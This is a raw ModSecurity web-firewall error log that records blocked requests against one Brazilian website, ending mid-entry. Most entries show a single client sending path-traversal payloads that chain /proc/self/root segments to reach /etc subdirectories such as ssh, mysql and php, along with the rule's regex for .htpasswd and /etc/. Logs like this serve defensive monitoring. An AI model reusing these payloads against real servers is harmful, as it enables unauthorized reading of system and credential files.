"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh6RkFeYa1D6dYQnC22AAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:42.409567 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:59508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh6sdf6f5d65gmYZQ8iAAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:46.191679 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.241.31:59514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh7v-YZRR_7pZ7nDJWkgAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:47.483403 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:34940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh7-yqAr6etmhZHNotQwAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:12:54.200848 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:34956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuh9uoXxyEfFpUF8f_abwAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:04.514061 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:34960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiAAkwaGbbGflqUZB92wAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:09.720276 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:42420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiBda6ubjKNq_cu4YJ8AAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:14.247126 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:41982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiCgkwaGbbGflqUZB95AAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:29.625812 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.241.31:41998] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiGf-YZRR_7pZ7nDJWqgAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:30.993450 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.241.31:40972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiGgbLMZ6AikZjR9UnOgAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:32.467949 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:40978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiHAbLMZ6AikZjR9UnQQAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:41.475229 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.241.31:40990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiJRkFeYa1D6dYQnC2-AAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:42.987200 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:49170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiJuyqAr6etmhZHNotXgAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:53.799048 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.241.31:49180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiMV_V7PWP6ixUYl6F4wAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:13:55.342839 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:60788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiM_u8EFLIOrSqIptnggAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:14:13.439534 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:60802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiRfu8EFLIOrSqIptnlwAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:14:23.227183 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.228.61:40324] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuiTwbLMZ6AikZjR9UnZAAAABM"]
[Thu Mar 19 04:15:14.795740 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.241.31:45712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuighkFeYa1D6dYQnC3XAAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:15:18.283885 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:34342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuihv-YZRR_7pZ7nDJW5AAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:15:19.679119 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:44352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuih-oXxyEfFpUF8f_aogAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:15:20.990252 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:44354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuiiPu8EFLIOrSqIptntwAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:15:33.327706 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:44368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuileyqAr6etmhZHNotmwAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:15:34.643126 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.241.31:42458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 